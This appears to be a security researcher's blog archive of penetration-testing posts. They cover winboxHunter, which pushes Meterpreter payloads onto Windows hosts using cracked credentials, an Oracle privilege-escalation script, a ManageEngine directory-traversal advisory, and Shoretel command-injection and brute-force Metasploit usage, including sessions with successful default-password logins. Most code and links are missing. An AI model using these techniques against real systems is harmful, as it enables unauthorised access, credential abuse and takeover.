Archive for the ‘Exploitation’ Category


August 27, 2014 Leave a comment


- Python2.7
- Impacket (svn checkout impacket-read-only)
- Ruby
- Veil Evasion (git clone


If you are working on a penetration test remotely, its sometimes hard to determine when the users start work or connect their laptops to the network.

winboxHunter is useful if you have managed to capture and cracked a bunch of NTLM credentails and want to run Metasploit against these windows boxes as and when they are connected to the network.

winboxHunter listens for NBNS broadcast packets so that when a new winBox is connected to the network, it will use the Impacket scripts ( and to push an executable onto the winBox and runs it.

In the background, winboxHunter runs Metasploit with payload handler (multi/handler) and listens for incoming connections from the winboxes.

You might want to modify autorunCmd.rc to specify the Metasploit commands you want to run on the pwned winbox upon connecting back to Metasploit.

See meterpreter.rc and autorunCmd.rc for more details.

If a host changes its IP address due to DHCP lease expiration, it will not attempt to exploit the winbox twice.

Format of password.txt

domain/username password


Meterpreter executable

You only need to use one of the below 2 options

- You can either use your own meterpreter payload executable using the -e or –exe argument (payload=windows/meterpreter/reverse_https, rport=8443) or

- You can use the -n or –enableVeil argument to generate a meterpreter payload executable using Veil Evasion
You can run winboxHunter using the below sample command

ruby winboxHunter.rb -n -f password.txt -v

When you run winboxHunter, a linux screen with the name “msfscreen” will be created and msfconsole will be executed. You can connect to the screen via the below command

screen -dr msfscreen

The source code for winboxHunter can be found at

Oracle Exploitation – Privilege Escalation

September 7, 2013 Leave a comment


Many times during Penetration Tests, we found a limited account for the Oracle database server.  The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges.  The Metasploit modules scripts below are for different varying versions of Oracle database servers. I cant remember which Metasploit modules are for which versions.

Metasploit Oracle SQL Injection Modules

To speed things up, I wrote a script that does the below

(1) Check if the account specified has access to the database
(2) Check if the account has DBA privileges
(3) If no, check the version of the Oracle database server
(4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk
(5) Run the Metasploit resource script and attempt to gain DBA privileges
(6) Check permissions of account and verifies if DBA privileges have been obtained. script script

The script is still a work in progress.  You can download the script via the below link.

Categories: Exploitation, Oracle

WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload vulnerability (CVE-2013-3684)

August 10, 2013 Leave a comment

I converted the original WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload exploit from Perl to Python for fun.

The original exploit can be found at

Below is the python script for CVE-2013-3684


Categories: Exploitation

Vuln Details for ManageEngine ServiceDesk Plus 8.0 Released

June 23, 2011 Leave a comment

I have been working with ManageEngine support team on getting the issue fixed and also informing the customers to patch their system with the latest service pack release version 8012 for over a month plus.

The vulnerability has been published in the below sites.

Below are the details of the vulnerability.

Google Dork: ie: intitle:ManageEngine ServiceDesk Plus”
Author: Keith Lee (
/* */
), @keith55,

Software Link:
Version: 8.0


Directory traversal vulnerabilities has been found in ManageEngine
ServiceDesk Plus 8.0 a web
based helpdesk system written in Java.

The vulnerability can be exploited to access local files by entering
special characters in variables used to create file paths. The attackers
use �../� sequences to move up to root directory, thus permitting
navigation through the file system.

GET http://%5Bwebserver

The issue is fixed with Service Pack Build 8012 found in the below link.

Categories: Exploitation

Found a zero day for major helpdesk system

June 18, 2011 Leave a comment

Watch this space. I will publish this in the next couple of days. Most companies published their help desk on the Internet.

Categories: Exploitation

Hacking Shoretel Converged Conferencing Bridge

April 15, 2011 Leave a comment

This metasploit module was made with the help of Josh @savant42 for #thotcon
The methodology of this hack comes entirely from Josh. This metasploit module is made by both of us..

Thumbs up to Josh for coming up with this.

This post is based on Josh’s (@savant42) talk at #thotcon

In Shoretel Converged Conferencing Bridge, Monitoring> System Commands page is vulnerable to command injection

Another problem is that the backup job runs as root

This can be found under Configuration > Manual Server Backup

Based on these 2 vulnerabilities, this metasploit module is born.

A demo video of the metasploit module can be found here

The metasploit module can be found here

Below is a screenshot of the metasploit module in action

Categories: Exploitation, Metasploit

Exploiting Shoretel Server

March 20, 2011 Leave a comment

Hacking Shoretel Voip Server

A demo has been uploaded to youtube

The meterpreter script can be used to audit the user accounts on the Shoretel server. This is written for Shoreware Director Build 14.X

There are 2 ways of accessing shoretel voice services. One via the IP phone and another via soft client (Shoretel Call Manager client)
The default password for Shoretel Call Manager is ‘changeme’ and if a person has never login into Shoretel Cal Manager client before, he/she will not be able to change the password.
What are the complications if you have never change the password for your soft client login?
That means that an intruder will be able to login into your extension using the default password ‘changeme’ and

1. Access Call Logs
2. Make Calls
3. Access Your Voice Mails
4. Eavesdrop on an Extension via Intercom ?
5. Impersonate as another user and send malicious links to another users via the IM feature.

Mitigation Methods

Up to now, I do not know of any options in Shoreware Director to change the default call manager password other than manually editing each account and changing the password.
Enabling AD authentication might be another viable option.

You can download my meterpreter script from to audit the accounts on your servers which are using the default password.

Bruteforce a user account using default paswords

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set USERNAME test1
msf > set TEST_OPTION 1
msf > run

[*] Shoreware Director Web Console – Testing Default Passwords for User Accounts
[*] – Trying username:’user1′ password:’changeme
‘[-] – Successful login ‘user1′ : ‘changeme’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bruteforce using password list (Dictionary Attack)
Since the shoretel system have no restrictions on the complexity of the passwords that the users can set for their soft client login and the absence of account lockout policies (for non AD authentication), it is possible to brute force an account.

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set TEST_OPTION 2
msf > set USERNAME user1
msf > run

[*] – Trying username:’user1′ password:’1234′
[-] – Failed to login as ‘user1′ using password ’1234
‘[*] – Trying username:’user1′ password:’12345′
[-] – Successful login ‘user1′ : ’12345′
‘[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

Check which user accounts using default passwords

If you already have access to the target’s computer, you can use the getOAB script I wrote to extract all email addresses from the Outlook Offline Address Book to be used for this test.
Check this blog post for more information

msf > use auxiliary/gather/search_email_collector
msf > set DOMAIN
msf > set OUTFILE “c:/Program Files/Rapid7/framework/msf3/data/wordlists/shoretel_users.txt”
msf > run

Edit shoretel_users.txt and make sure that a username is in each line

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 1
msf > run

[*] – Trying username:’user1′ password:’changeme’
[-] – Invalid Username ‘user1
‘[*] – Trying username:’user2′ password:’changeme
‘[-] – Successful login ‘user2′ : ‘changeme’
‘[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use Dictionary Attacks Against User Accounts
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 2
msf > set PASS_FILE “C:/Program Files/Rapid7/framework/msf3/data/wordlists/dict.txt”
msf > run

Categories: Exploitation, Metasploit

Get every new post delivered to your Inbox.